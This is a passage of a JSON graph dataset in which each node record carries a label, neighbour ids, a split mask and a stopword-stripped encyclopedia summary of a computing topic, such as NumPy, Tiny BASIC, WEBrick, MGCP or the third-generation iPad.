    "label": 3,
    "text": "King's_Valley:king valley king ’ valley platform game released konami msx 1985 game plays like lode runner takes place egyptian pyramids intrepid adventurer player goal collect various gems evading angry mummies monsters long enough find exit next level port ms-dos made korean company named aproman supports monochrome cga graphic cards sequel king valley ii released msx two versions specifically designed msx msx2 respectively",
    "neighbors": [
      4551,
      9166,
      9006,
      10931,
      6109
    ],
    "mask": "Test"
  },
  {
    "node_id": 7680,
    "label": 4,
    "text": "Malware_Bell:malware bell malware bell malware program made taiwan somewhere 2006 2007 malware bell tries install automatically upon visiting website promoting containing malware",
    "neighbors": [
      7515
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7681,
    "label": 5,
    "text": "Media_gateway_control_protocol_architecture:media gateway control protocol architecture media gateway control protocol architecture methodology providing telecommunication services using decomposed multimedia gateways transmitting telephone calls internet protocol network traditional analog facilities public switched telephone network pstn architecture originally defined rfc 2805 used several prominent voice ip voip protocol implementations media gateway control protocol mgcp megaco h.248 successors obsolete simple gateway control protocol sgcp architecture divides functions required integration traditional telecommunication networks modern packet networks several physical logical components notably media gateway media gateway controller signaling gateways interaction media gateway controller defined media gateway control protocol media gateway protocols developed based internet model networking internet protocol suite referred device control protocols media gateway device offers ip interface legacy telephone interface converts media audio video streams legacy telephone interface may complex interface pstn switch may simple interface traditional telephone depending size purpose gateway may allow ip-originated calls terminate pstn vice versa may simply provide means connect telephone telecommunication system via ip network originally gateways viewed monolithic devices call control using protocols h.323 session initiation protocol hardware required control pstn interface 1998 idea splitting gateway two logical parts proposed one part contains call control logic called media gateway controller mgc call agent ca part interfaces pstn called media gateway mg functional split new interface existed mgc mg requiring framework communication elements resulting media gateway control protocol architecture sip h.323 signaling protocols media gateway control protocols device control protocols architectural difference sip h.323 media gateway control protocols relationships entities sip h.323 peer-to-peer relationships entities media gateway control protocols use master/slave technology model sip h.323 handle call setup connection management tear-down calls like interfaces whereas media gateway control protocols define mechanisms setup media paths streams ip networks several implementations media gateway control protocol common use names best-known protocols abbreviations protocol group although similar architecture mgcp h.248/megaco distinctly different protocols interoperable h.248/megaco mgcp protocols complementary h.323 sip may referred intelligent endpoint protocols h.248/megaco mgcp may referred device control protocols media gateway control protocols include predecessors mgcp namely simple gateway control protocol sgcp internet protocol device control ipdc proprietary protocol using similar architecture cisco skinny call control protocol sccp media gateway device converts media streams form digital data analog signals telecommunication services voice video fax applications two usually dissimilar interfaces using different technologies one technologies usually packet frame cell network example may convert voice telephone calls traditional analog telephone digital format transmission internet protocol ip network facilitate voice ip communications media gateway controller mgc also known call agent controls media gateways monitors gateways events off-hook state user intends initiate telephone call issues requests gateway initiate complete sessions alert called party terminate call protocols used interaction gateway controller evolved various types versions simple gateway control protocol sgcp internet protocol device control ipdc replaced media gateway control protocol mgcp megaco also known h.248 mgcs interface signaling protocols signalling system 7 ss7 interconnection traditional telephone system h.323 session initiation protocol sip device control protocols evolved several versions mgcp emerged group called international softswitch consortium group started early level 3 communications acquisition xcom telcordia bellcore july 1998 telcordia bellcore cisco systems created protocol called simple gateway control protocol sgcp controlling telephony gateways external call control elements meanwhile mid-1998 level 3 created technical advisory council tac composed dozen leading communications equipment manufacturers tac proposed device protocol called internet protocol device control ipdc august 1998 ipdc intended used media gateway media gateway controller media gateway capable acting voice ip gateway voice atm gateway dialup modem media gateway circuit switch cross- connect october 1998 simple gateway control protocol sgcp combined internet protocol device control ipdc resulting mgcp mgcp submitted ietf ’ megaco working group october 1998 november 1998 lucent technologies submitted draft third device protocol called media device control protocol mdcp use media gateways controllers ietf merged mgcp mdcp proposed new improved protocol named megaco protocol also known h.248 april 1999 first official version mgcp defined rfc 2705 informational rfc 3435 obsoleted rfc 2705 mgcp currently purely informational rather standard-track protocol although includes protocol specification even mgcp still internet draft many companies developed included mgcp development rather wait standardized protocol therefore decision made release mgcp informational rfc october 1999 ietf development mgcp stopped although companies continue implement mgcp driven efforts packetcable development network-based call signaling standardization mgcp effort pursued ietf megaco working group also itu-t/sg16 code name h.gcp rfc 3015 standard tracks megaco protocol also h.248 motivation megaco need satisfy various requirements addressed properly mgcp megaco evolution mgcp combination mgcp mdcp published standard rfc 3015 november 2000 megaco mgcp different interoperable h.248 h.248.1 gateway control protocol version 3 published international telecommunication union telecommunication itu-t protocol standard itu-t published three versions h.248.1 ietf published gateway control protocol version 1 informational rfc 3525 h.248 mgcp protocol controlling media gateways using media gateway controller call agent voip system h.248 mgcp used sip h.323 sip h.323 provide intercommunication gateway controllers mgcp used manage media establishment media gateways",
    "neighbors": [
      5472,
      614,
      5576,
      9131,
      7407,
      9711,
      6769,
      6834,
      5843,
      8437,
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 7682,
    "label": 2,
    "text": "SUPER-UX:super-ux super-ux version unix operating system nec used sx series supercomputers initial version super-ux based unix system v version 3.1 features bsd 4.3 version nec sx-9 based svr4.2mp bsd enhancements super-ux 64-bit unix operating system supports supercomputer file system sfs earth simulator uses custom os called esos earth simulator operating system based super-ux many enhanced features custom designed earth simulator regular super-ux os",
    "neighbors": [
      2179,
      6787,
      6412,
      5397,
      2710,
      1304,
      3487,
      8355,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      9151,
      10436,
      1480,
      6369,
      5492,
      2424,
      633
    ],
    "mask": "Test"
  },
  {
    "node_id": 7683,
    "label": 5,
    "text": "Obfuscated_TCP:obfuscated tcp obfuscated tcp obstcp proposal transport layer protocol implements opportunistic encryption transmission control protocol tcp designed prevent mass wiretapping malicious corruption tcp traffic internet lower implementation cost complexity transport layer security tls august 2008 ietf rejected proposal tcp option suggesting done application layer instead project inactive since months later 2010 june separate proposal called tcpcrypt submitted shares many goals obstcp transparent applications opportunistic low overhead requires even less configuration dns entries http headers unlike obstcp tcpcrypt also provides primitives application implement authentication prevent man-in-the-middle attacks mitm obstcp created adam langley concept obfuscating tcp communications using opportunistic encryption evolved several iterations experimental iterations obstcp used tcp options 'syn packets advertise support obstcp server responding public key 'synack ietf draft protocol first published july 2008 packets encrypted salsa20/8 signed packets md5 checksums present third iteration uses special dns records band methods advertise support keys without modifying operation underlying tcp protocol obstcp low cost protocol intended protect tcp traffic without requiring public key certificates services certificate authorities complex public key infrastructure intended suppress use undirected surveillance trawl unencrypted traffic rather protect man middle attack software presently supports salsa20/8 stream cipher curve25519 elliptic-curve diffie hellman function server using obstcp advertises public key port number dns record may used advertise server support obstcp dns 'cname record providing 'friendly name http header records cached/out band keyset information may also used instead client connecting obstcp server parses dns entries uses http header records uses cached/out band data obtain public key port number connecting server encrypting traffic",
    "neighbors": [
      517,
      2887,
      10924,
      10831,
      9744,
      5078,
      3742,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 7684,
    "label": 9,
    "text": "NumPy:numpy numpy pronounced sometimes library python programming language adding support large multi-dimensional arrays matrices along large collection high-level mathematical functions operate arrays ancestor numpy numeric originally created jim hugunin contributions several developers 2005 travis oliphant created numpy incorporating features competing numarray numeric extensive modifications numpy open-source software many contributors python programming language initially designed numerical computing attracted attention scientific engineering community early special interest group called matrix-sig founded 1995 aim defining array computing package among members python designer maintainer guido van rossum implemented extensions python syntax particular indexing syntax make array computing easier implementation matrix package completed jim fulton generalized jim hugunin become numeric also variously called numerical python extensions numpy hugunin graduate student massachusetts institute technology mit joined corporation national research initiatives cnri work jpython 1997 leaving paul dubois lawrence livermore national laboratory llnl take maintainer early contributors include david ascher konrad hinsen travis oliphant new package called numarray written flexible replacement numeric like numeric deprecated numarray faster operations large arrays slower numeric small ones time packages used different use cases last version numeric v24.2 released 11 november 2005 numarray v1.5.2 released 24 august 2006 desire get numeric python standard library guido van rossum decided code maintainable state early 2005 numpy developer travis oliphant wanted unify community around single array package ported numarray features numeric releasing result numpy 1.0 2006 new project part scipy avoid installing large scipy package get array object new package separated called numpy support python 3 added 2011 numpy version 1.5.0 2011 pypy started development implementation numpy api pypy yet fully compatible numpy numpy targets cpython reference implementation python non-optimizing bytecode interpreter mathematical algorithms written version python often run much slower compiled equivalents numpy addresses slowness problem partly providing multidimensional arrays functions operators operate efficiently arrays requiring rewriting code mostly inner loops using numpy using numpy python gives functionality comparable matlab since interpreted allow user write fast programs long operations work arrays matrices instead scalars comparison matlab boasts large number additional toolboxes notably simulink whereas numpy intrinsically integrated python modern complete programming language moreover complementary python packages available scipy library adds matlab-like functionality matplotlib plotting package provides matlab-like plotting functionality internally matlab numpy rely blas lapack efficient linear algebra computations python bindings widely used computer vision library opencv utilize numpy arrays store operate data since images multiple channels simply represented three-dimensional arrays indexing masking arrays efficient ways access specific pixels image numpy array universal data structure opencv images extracted feature points filter kernels many vastly simplifies programming workflow debugging core functionality numpy ndarray n -dimensional array data structure arrays strided views memory contrast python built-in list data structure despite name dynamic array arrays homogeneously typed elements single array must type arrays also views memory buffers allocated c/c++ cython fortran extensions cpython interpreter without need copy data around giving degree compatibility existing numerical libraries functionality exploited scipy package wraps number libraries notably blas lapack numpy built-in support memory-mapped ndarrays inserting appending entries array trivially possible python lists np.pad ... routine extend arrays actually creates new arrays desired shape padding values copies given array new one returns numpy np.concatenate a1 a2 operation actually link two arrays returns new one filled entries given arrays sequence reshaping dimensionality array np.reshape ... possible long number elements array change circumstances originate fact numpy arrays must views contiguous memory buffers replacement package called blaze attempts overcome limitation algorithms expressible vectorized operation typically run slowly must implemented pure python vectorization may increase memory complexity operations constant linear temporary arrays must created large inputs runtime compilation numerical code implemented several groups avoid problems open source solutions interoperate numpy include codice_1 numexpr numba cython pythran static-compiling alternatives",
    "neighbors": [
      5130,
      11406,
      7580,
      7326,
      1952,
      8611,
      9893,
      10670,
      7983,
      7728,
      2045,
      10683,
      462,
      5588,
      11221,
      2135,
      9320,
      11625,
      8554,
      363,
      5612,
      2670,
      9330,
      6134,
      3960,
      1917
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7685,
    "label": 4,
    "text": "LuckyBackup:luckybackup luckybackup free backup application provides gui based cross-platform qt framework fundamentally console based web based many clients list backup software shares data differencing copying tool rsync backuppc several others runs linux unix based system provides qt libraries rsync gui translated many languages available repositories major linux distributions including debian ubuntu opensuse fedora mandriva slackware gentoo",
    "neighbors": [
      9025,
      11492,
      10149,
      3366,
      6280,
      5482,
      5612,
      1358,
      7983,
      10192,
      5492,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 7686,
    "label": 7,
    "text": "Key_distribution:key distribution symmetric key cryptography parties must possess secret key must exchange prior using encryption distribution secret keys problematic recently involved face-to-face meeting use trusted courier sending key existing encryption channel first two often impractical always unsafe third depends security previous key exchange public key cryptography key distribution public keys done public key servers person creates key-pair keep one key private known public-key uploaded server accessed anyone send user private encrypted message ... secure sockets layer ssl uses diffie–hellman key exchange client public-private key pair published certificate public key infrastructure public key cryptography user keys credential key distribution important issue wireless sensor network wsn design many key distribution schemes literature designed maintain easy time secure communication among sensor nodes accepted method key distribution wsns key predistribution secret keys placed sensor nodes deployment nodes deployed target area secret keys used create network info see key distribution wireless sensor networks key distribution key storage problematic cloud due transitory nature agents secret sharing used store keys many different servers cloud secret sharing secret used seed generate number distinct secrets pieces distributed subset recipients jointly authenticate use secret information without learning rather store files different servers key parceled secret shares stored multiple locations manner subset shares regenerate key secret sharing used cases one wishes distribute secret among n shares n n regenerate original secret smaller group − 1",
    "neighbors": [
      8674,
      10831
    ],
    "mask": "None"
  },
  {
    "node_id": 7687,
    "label": 3,
    "text": "Elbrus-8S:elbrus-8s elbrus-8s russian 28 nanometer 8-core microprocessor developed moscow center sparc technologies mcst first prototypes produced end 2014 serial production started 2016 elbrus-8s used servers workstations four elbrus processors server motherboard puts total 32 processor cores server blade 2018 mcst announced plans production updated version twice performance elbrus-8sv cpu features 576 gflops 1.5 ghz well ddr4 support instead ddr3 engineering samples already completed q3 2017",
    "neighbors": [
      4386,
      6659,
      6818,
      7234,
      2503,
      6957,
      5358,
      1776,
      1425,
      499,
      1399,
      2490,
      2523,
      11580,
      9309
    ],
    "mask": "Test"
  },
  {
    "node_id": 7688,
    "label": 4,
    "text": "Cloudbric_Labs:cloudbric labs cloudbric labs collection free web security resources tools provided cloud-based web security provider cloudbric ’ designed use developers webmasters end users interested achieving maintaining basic website security cloudbric labs composed api offered allow users integrate information cloudbric labs security platforms",
    "neighbors": [
      331,
      1108
    ],
    "mask": "Test"
  },
  {
    "node_id": 7689,
    "label": 2,
    "text": "Woof_(software):woof software woof software application used build puppy linux distribution another linux distribution application must run inside puppy linux internet connection required order download linux distro binary packages cd-remaster program available puppy linux used build variants puppy linux distribution process used woof build puppy linux distribution another linux distribution linux distributions woof use foundation puppy linux distribution",
    "neighbors": [
      477,
      6583,
      10016,
      10149,
      5670,
      8262,
      5067,
      5356,
      9964,
      6352,
      499,
      2195,
      5363,
      823,
      6393,
      7483,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7690,
    "label": 8,
    "text": ".NET_My_Services:.net services .net services codenamed hailstorm abandoned collection xml-based web services microsoft storing retrieving information net services announced march 19 2001 part microsoft .net initiative intended rely known microsoft passport single sign-in web service referred microsoft account .net services platform intended facilitate storage retrieval user-related information contacts calendar information e-mail messages allowing accessed centralized repository across various applications device types including traditional desktop pcs mobile devices laptops mobile phones pdas tablet pcs access stored information would based solely user discretion technology would rely subscription-based business model although technology required microsoft passport based cross-platform open standard web services including soap uddi ws-discovery enabled interoperability compatible systems without requiring microsoft windows .net services announced march 19 2001 microsoft intended reach broad developer availability year professional developers conference subsequent end-user release scheduled 2002 however due industry concerns related anti-competitive behavior end-user privacy company ultimately abandoned initiative could fully materialize",
    "neighbors": [
      425,
      5612,
      6797,
      9328,
      10486,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 7691,
    "label": 9,
    "text": "Tiny_BASIC:tiny basic tiny basic dialect basic programming language fit little 2 3 kb memory small size made invaluable early days mid-1970s typical memory size 4 8 kb meet strict size limits math purely integer based lacked arrays language written part alternative microsoft basic ms basic would also run 4 kb machines left 790 bytes free programs free space significant advantage tiny basic another reason tiny basic popularity open letter published bill gates complaining users ripping ms basic tiny basic published openly later invented term copyleft describe made popular burgeoning early microcomputer market tiny basic published newsletter offshoot people computer company dozens versions created almost every platform era many variations additions published time newsletter eventually became dr. dobb journal long-lived computing magazine tiny basic example free software project existed free software movement dennis allison member computer science faculty stanford university wrote specification simple version basic programming language urged create standard bob albrecht homebrew computer club seen basic minicomputers felt would perfect match new machines like mits altair 8800 released january 1975 allison proposed design used integer arithmetic support arrays goal program fit 2 3 kilobytes memory first version published people computer company separate newsletter format known tiny basic journal full name dr. dobb tiny basic journal calisthenics orthodontia running light without overbyte first issue released january 1976 point programmers began modifying code sending results back published future issues sending magazines like interface age scope original newsletter expanded eventually became known simply dr. dobb journal dick whipple john arnold wrote interpreter required 3k ram middle 1976 tiny basic interpreters available intel 8080 motorola 6800 mos technology 6502 processors forerunner free software community collaborative development internet allowed easy transfer files example free software project free software movement computer hobbyists would exchange paper tapes cassettes even retype files printed listings jim warren editor dr. dobb wrote july 1976 acm programming language newsletter motivations methods successful project started viable alternative problems raised bill gates irate letter computer hobbyists concerning 'ripping software software free inexpensive easier pay duplicate wo n't 'stolen bill gates letter written make software products alternative method experienced professional overall design outline implementation strategy knowledgeable amateurs would implement design variety computer systems warren predicted strategy would continued expanded may 1976 issue dr. dobbs li-chen wang palo alto tiny basic intel 8080 microprocessor listing began usual title author name date also copyleft wrongs reserved fellow homebrew computer club member roger rauskolb modified improved li-chen wang program published december 1976 issue interface age magazine roger added name preserved copyleft notice versions tiny basic existed one written thomas f. waitman 1976 hewlett-packard hp-2640 hp-2645 terminals used intel 8008 8080 processors 8080 ran tiny basic interpreter thomas f. waitman wrote articles hewlett-packard journal 1977 radioshack released first computer trs-80 basic interpreter rom derived palo-alto tiny basic dr. wang version occupied less 2kb radioshack derivation replaced integer representation numbers floating point representation added i/o support e.g cassette tape interface version known level basic fit 4kb rom grammar listed backus-naur form listing asterisk denotes zero object left — except first asterisk definition term multiplication operator parentheses group objects epsilon ε signifies empty set common computer language grammar notation vertical bar distinguishes alternatives listed separate lines symbol cr denotes carriage return usually generated keyboard enter key break console interrupt execution program implementations including first tiny basic tom pittman tiny basic virtual machine used others palo alto tiny basic 6800 tiny basic direct interpreters virtual machine implementation tiny basic interpreter run virtual machine interpreter designer idea use application virtual machine goes back val schorre meta ii 1964 glennie syntax machine following table gives partial list commands virtual machine first tiny basic interpreter written length whole interpreter program 120 virtual machine operations thus choice virtual machine approach economized memory space implementation effort although basic programs run thereon executed somewhat slowly",
    "neighbors": [
      3718,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      9891,
      7076,
      5925,
      8101,
      11683,
      4136,
      10666,
      5677,
      8494,
      303,
      7343,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      8262,
      10750,
      712,
      847,
      5711,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      7281,
      9714,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 7692,
    "label": 4,
    "text": "Information_Systems_Security_Association:information systems security association information systems security association issa not-for-profit international professional organization information security professionals practitioners founded 1984 work establishment started 1982 issa promotes sharing information security management practices educational forums publications networking opportunities among security professionals issa members award winners include many industry ’ notable luminaries represents wide range industries – communications education healthcare manufacturing financial consulting well federal state local government departments agencies association publishes issa journal peer-reviewed publication issues trends industry also partners esg enterprise strategy group release yearly research report life times cyber security professional examine experiences cybersecurity professionals navigate modern threat landscape effects careers information systems security association board directors elected annually members set committees appointed headquarters issa located vienna virginia issa international board directors executive officers president candy alexander cissp cism vice president roy wilkinson phd cpcs chs-v cissp secretary/director operations anne rogers cissp cce pmp ence iam iem treasurer/chief financial officer pamela fusco cissp issa international membership base primary goal issa promote management practices ensure confidentiality integrity availability information resources issa facilitates interaction education create successful environment global information systems security professionals involved issa goals promote security education skills development encourage free information exchanges communicate current events within security industry help express importance security controls enterprise business management applicant membership individual expected bounded principle ethics related information security career applicants issa membership attest issa present one hundred countries including europe asia 10,000 members",
    "neighbors": [
      1312,
      3552,
      10717,
      4435,
      6773,
      6648,
      6842,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7693,
    "label": 7,
    "text": "Epos_Now:epos epos cloud-based software provider specialising design manufacture electronic point sale commonly referred epos encompasses features including limited reporting stock control crm retail hospitality businesses epos software operated device platform web-browser using epos ios android app epos uk headquarters located norwich england us headquarters orlando florida founded june 2011 company pioneer cloud-technology epos industry notable first epos company introduce appstore customers allows users customise system epos appstore introduced december 2014 epos innovation recognised 2016 company queen award enterprise uk highest accolade business success epos uk 13th fastest growing private technology company fastest growing epos company uk epos founded jacyn heavens 2011 external investment ceo founder jacyn heavens identified gap market affordable epos system whilst managing bar searching epos system would suitable business started building software would suit business owners like epos appstore officially launched september 2015 making first appstore released within epos industry 30,000 businesses using epos 2015 epos awarded 'epos innovation year retail systems shortlisted edp business awards tech cities 2015 2016 epos shortlisted uk cloud awards innovative smb product year category engagement loyalty awards innovative technology category epos also finalist 2016 grocer gold awards technology supplier year category 21 april 2016 announced epos queen award enterprise innovation category epos named gold stevie award winners international business awards innovative company year 2016 epos three eastern daily press business awards 2016 categories employer year tech innovator year business year sponsored barclays company made tech track 100 three years running named 13th 32nd 53rd fastest growing tech company uk named 30th fastest growing company 2016 deloitte fast 50 growth 597 epos named 179th fastest growing tech company deloitte 2016 fast 500 emea epos named europes 46th fastest growing company financial times 1000 listing epos recognised commitment professional development employees winning princess royal training award 2017 epos noted 'best saas product small business/smbs 2017 saas awards",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7694,
    "label": 4,
    "text": "CDex:cdex cdex free software package digital audio extraction audio cd so-called cd ripper audio format conversion microsoft windows converts cdda tracks cd standard computer sound files wav mp3 ogg vorbis cdex previously released free software terms gnu general public license gpl however although website claims still case source code released since 2005 originally written albert l. faber developed maintained georgy berdyshev recent versions software may compromised security threat cdex able convert cd audio several formats including wav vorbis mp3 using lame encoder vqf musepack ape many others version 1.70b2 flac encoding native version 1.51 flac codecs used using external encoder supports cd-text allow ripped tracks reduced user effort names songs artists albums also automatically identify inserted audio cds look metadata means online database freedb automatic tagging naming sorting ripped files also includes cdparanoia robust cd reading cdex considered configurable relatively easy use 2000 start beta phase version 1.30 cdex turned free software project cdexos cdex open source hosted sourceforge.net january 2006 cdex homepage requested new project manager developer implying albert l. faber abandoned development cdex 5 june 2006 cdex 1.70 beta 1 released via sourceforge.net website ascribed georgy berdyshev first official update program almost three years cdex 1.70 beta 2 following soon 23 june 2006 2008 berdyshev joined ariane gomes project developers 18 november 2009 cdex 1.70 beta 4 released cdex 1.70 final released 29 june 2014 featuring unicode multibyte version 30 june 2007 one day release gplv3 license cdex updated however last version source code made available 1.70 beta 2 sourceforge project appears shut july 2015 shortly release version 1.79 version 1.76 installer includes adware opencandy november 2017 version 1.96 released clear current code maintainer contact details provided four versions released march 2018 recent reincarnation cdex seen number sponsored programs automatically selected installation little information nature scan results suggest may substantial risk system installed along source code longer publicly accessible preventing independent code review project considered exploited new maintainer trusted project trusted installed machine new maintainer taken new releases pushed showing activity support links broken ticketing system exist broken link contact details method interact developer installer installing adware without notifications new maintainer exploited strong reputation work project turned mechanism profit updates made application including installer hidden software installed later versions apparently also add artifacts ends certain tracks ripped program rolling back earlier version program eliminates issue",
    "neighbors": [
      8554,
      877,
      6797,
      7983,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7695,
    "label": 8,
    "text": "WEBrick:webrick webrick ruby library providing simple http web servers webrick primarily written masayoshi takahashi yuuzou gotou contributions developers via open-source model software development uses basic access authentication digest access authentication different kinds servers create http based server https server proxy server virtual-host server construction several non-http servers day time server uses daytime protocol rather http also facilitated webrick used ruby rails padrino frameworks test applications development environment well production mode small loads part ruby standard library webrick originated idea article named internet programming ruby open design japanese engineering magazine initially developed toolkit development http servers using ruby due nature open source model contributions several ruby developers across world webrick greatly augmented eventually bundled standard library ruby 1.8.0 webrick erb handler webrick proxy server first introduced ruby 1.9.3 webrick virtual host included ruby 2.0.0 webrick server understands language servlets uses multiple independent servlets joined together programmer handling cgi scripts erb pages ruby blocks directory listings provide web application service request uri per-host per-path basis example httpservlet :filehandler httpservlet :prochandler httpservlet :cgihandler httpservlet :erbhandler examples standard servlets webrick comes webrick included ruby hence available user additional cost webrick written completely ruby supports several standards http html even rhtml development stage necessity installation discrete web server since webrick already built rails framework default web server ruby application deployed without procfile rails furthermore since implemented entirely ruby direct calls made webrick rails application whole provides reliable low configuration option testing development following commands used start http server required port require 'webrick' root file.expand_path '/var/myapp/' server webrick :httpserver.new port 1234 documentroot root server.mount_proc '/ |request response| end trap 'int server.shutdown server.start servlets mounted provide advanced custom behavior compared proc increase modularity webrick creates listening port various ports ‘ virtual hosts ’ also created time listen shown vhost webrick :httpserver.new servername 'vhost.example vhost.mount '/ ... server.virtual_host vhost nowiki /nowiki documentroot provided instance servlet set service request uri otherwise 404 error returned enabling ssl providing ssl certificate name https server initiated self-signed certificate changes every restart server require 'webrick' require 'webrick/https' cert_name w cn localhost server webrick :httpserver.new port 1234 however pre-determined key certificate also provided instantiating https server shown require 'openssl' cert openssl :x509 :certificate.new file.read '/var/myapp/cert.pem' pkey openssl :pkey :rsa.new file.read '/var/myapp/pkey.pem' server webrick :httpserver.new port 1234 webrick also proxy get head post requests require 'webrick/httpproxy' proxy webrick :httpproxyserver.new port 1234 trap 'int proxy.shutdown end unlike servers used production webrick scalable since single threaded web server default hence multiple requests time handled subsequent requests would wait till previous requests handled incurring large delay hence developers prefer multi-threaded full-fledged web servers like lighttpd mongrel deploying rails applications",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      2191,
      1937,
      7443,
      10771,
      9245,
      8350,
      7457,
      3746,
      8994,
      11682,
      3237,
      9125,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      564,
      2485,
      4277,
      5945,
      6714,
      1852,
      5567,
      6338,
      1991,
      11208,
      5578,
      11134,
      595,
      1363,
      3545,
      10973,
      7264,
      225,
      865,
      1379,
      2404,
      4837,
      871,
      11625,
      6379,
      5612,
      9580,
      11376,
      8691,
      2804,
      4725,
      10611,
      11386,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 7696,
    "label": 2,
    "text": "Gutenprint:gutenprint gutenprint formerly gimp-print collection free-software printer drivers use unix spooling systems cups lpr lprng drivers provide printing services unix-like systems including linux macos risc os haiku originally developed plug-in gimp later became general tool use programs operating systems macos windows apple introduced mac os x omitted printer drivers claiming printer manufacturer task produce many update drivers since apple chosen use cups core printing system gimp-print filled void gutenprint 1,300 drivers apollo apple brother canon citizen compaq dai nippon dec epson fujifilm fujitsu gestetner hp ibm infotec kodak kyocera lanier lexmark minolta nec nrg oki olivetti olympus panasonic pcpi raven ricoh samsung savin seiko sharp shinko sony star tally tektronix xerox printers many users incorrectly called gimp software renamed gutenprint clearly distinguish gimp name gutenprint recognizes johannes gutenberg inventor movable type printing press epson backend active development new printers bug fixes capability additions contributed new release backend active development new printers bug fixes capability additions contributed new release canon printers use intelligent printheads control quality final output given metadata sent printer driver consequence design print quality specified resolution alone via resolution mode quality setting 5 quality settings available time resolution parameter driver-output data meta-resolution typically either 300 600 dpi sometimes 1200 dpi certain monochrome high-quality photo modes limited number printers firmware controls printhead creates physical ink output marketed resolution available quality selections depends number parameters applicable media printed duplex simplex borderless bordered color monochrome printing inkset selection cartridge selection thus number available resolution modes per media available depending parameters set printjob since gutenprint options always available via ppd driver attempts select reasonable defaults cases user settings contradiction prioritization follows media type resolution mode cartridge selection inkset selection duplex selection parameter clash detected driver resolution mode parameters set according priority substitution resolution mode carried try maintain required quality initially requested borderless selection added version 5.2.9 currently part prioritization replacement algorithm small number printers analyzed discover appropriate modes media borderless printing pcl color laser lexmark backends currently unmaintained volunteers welcome fairly often printers would use backends emulation capability languages particular postscript case printer configured use standard postscript driver",
    "neighbors": [
      3974,
      8360,
      7626,
      7983,
      10960,
      5397,
      823,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7697,
    "label": 2,
    "text": "IPad_(3rd_generation):ipad 3rd generation third-generation ipad marketed new ipad colloquially referred ipad 3 tablet computer developed marketed apple inc third device ipad line tablets added retina display new apple a5x chip quad-core graphics processor 5-megapixel camera hd 1080p video recording voice dictation support lte networks north america shipped ios 5 also provides platform audio-visual media including electronic books periodicals films music computer games presentations web content united states canada nine variations third-generation ipad offered compared six rest world although countries wi-fi model variation available black white front glass panels options 16 32 64 gb storage north america connectivity options wi-fi wi-fi 4g lte verizon telus rogers bell rest world outside north america connectivity options wi-fi wi-fi model wi-fi 3g wi-fi cellular model latter unavailable countries 4g lte connectivity device available outside north america wi-fi cellular model includes gps capability initially cellular version titled marketed worldwide wi-fi 4g model due regional differences classification 4g lte connectivity outside north america apple later rebranded altered marketing call wi-fi cellular model tablet released ten countries march 16 2012 gained mostly positive reviews earning praise retina display processor 4g lte capabilities however controversy arose lte incompatibilities became known three million units sold first three days seven months 221 days official availability third-generation ipad discontinued october 23 2012 following announcement fourth-generation ipad third-generation ipad shortest lifespan ios product also last ipad support 30-pin dock connector fourth-generation ipad later use lightning connector speculation product began shortly apple released ipad 2 featured front back cameras well dual-core apple a5 processor speculation increased news 2,048-by-1,536 pixel screen leaked time tablet called ipad 3 colloquial name sometimes still used release february 9 2012 john paczkowski things digital stated apple ’ holding event february—strange unusual otherwise holding one march—to launch next ipad another common rumor time tablet would apple a6 processor february 29 2012 apple announced media event scheduled march 7 2012 yerba buena center arts company predisclose subject event analysts widely expected event announce new version ipad announcement affected tablet resale market positively event apple ceo tim cook introduced japanese version siri third-generation apple tv third-generation ipad cook claimed new product would one main contributors emerging post-pc world —a world digital life would tied pc march 16 2012 release included eight countries including australia canada japan singapore united kingdom united states march 23 2012 release included many european countries mexico macau april 20 2012 release added dozen countries including south korea malaysia april 27 2012 release added nine countries including india south africa may 2012 releases added 31 countries including brazil turkey october 23 2012 upon announcement fourth-generation ipad third-generation ipad discontinued response criticism owners return policy select apple stores briefly extended thirty days allow customers exchange third-generation model fourth-generation model third-generation ipad shipped ios 5.1 released march 7 2012 act hotspot carriers sharing internet connection wi-fi bluetooth usb providing wi-fi cellular model also access app store digital application distribution platform ios developed maintained apple service allows users browse download applications itunes store developed xcode ios sdk published apple app store garageband imovie iphoto iwork apps pages keynote numbers available ipad comes several pre-installed applications including safari mail photos videos youtube music itunes app store maps notes calendar game center photo booth contacts like ios devices ipad sync content data mac pc using itunes although ios 5 later managed backed without computer although tablet designed make phone calls cellular network users use headset built-in speaker microphone place phone calls wi-fi cellular using voip application skype device dictation using voice recognition technology iphone 4s user speaks ipad types say screen provided ipad connected wi-fi cellular network third-generation device optional ibooks application displays books epub-format content downloaded ibookstore several major book publishers including penguin books harpercollins simon schuster macmillan committed publishing books device despite direct competitor amazon kindle barnes noble nook amazon.com barnes noble offer e-reader apps ipad september 19 2012 ios 6 contains 200 new features released ios 6 update includes new features apple maps replaced mapping application operated google facebook integration ability operate siri third-generation ipad third-generation ipad compatible ios 7 released 2013 although complete support newer features airdrop released newer models supported similar support also given iphone 4s ios 8 also supported third-generation ipad however features stripped ios 9 supports third-generation ipad well fifth major ios release model supports ios 9 public beta also compatible model supported 3 years ios 9.3.5 latest final version support ipad 3rd generation wi-fi model wi-fi cellular version runs ios 9.3.6 researchers demonstrated within hours product release third-generation ipad jailbroken use applications programs authorized apple third-generation ipad jailbroken redsn0w 0.9.12 absinthe 2.0 jailbreaking violates factory warranty one main reasons jailbreaking expand feature set limited apple app store jailbreaking tools automatically install cydia native ios apt client used finding installing software jailbroken ios devices many apps unapproved apple extensions customizations ios apps users install programs personalize customize interface adding desired features fixing annoyances simplify app 